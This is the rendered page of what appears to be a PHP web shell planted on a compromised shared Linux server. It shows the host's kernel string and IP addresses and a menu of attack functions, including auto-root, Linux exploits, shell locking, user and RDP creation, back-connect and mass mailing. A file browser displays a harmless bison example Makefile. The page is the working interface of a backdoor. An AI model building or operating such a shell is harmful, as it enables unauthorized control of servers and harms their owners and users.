Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
bison /
examples /
c /
lexcalc /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
581
B
-rw-r--r--
README.md
796
B
-rw-r--r--
parse.y
3.24
KB
-rw-r--r--
scan.l
2.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# This Makefile is designed to be simple and readable. It does not # aim at portability. It requires GNU Make. BASE = lexcalc BISON = bison FLEX = flex all: $(BASE) %.c %.h %.html %.xml %.gv: %.y $(BISON) $(BISONFLAGS) --header --html --graph -o $*.c $< %.c: %.l $(FLEX) $(FLEXFLAGS) -o$@ $< scan.o: parse.h $(BASE): parse.o scan.o $(CC) $(CFLAGS) -o $@ $^ run: $(BASE) @echo "Type arithmetic expressions. Quit with ctrl-d." ./$< CLEANFILES = \ $(BASE) *.o \ parse.[ch] parse.output parse.xml parse.html parse.gv \ scan.c clean: rm -f $(CLEANFILES)
Close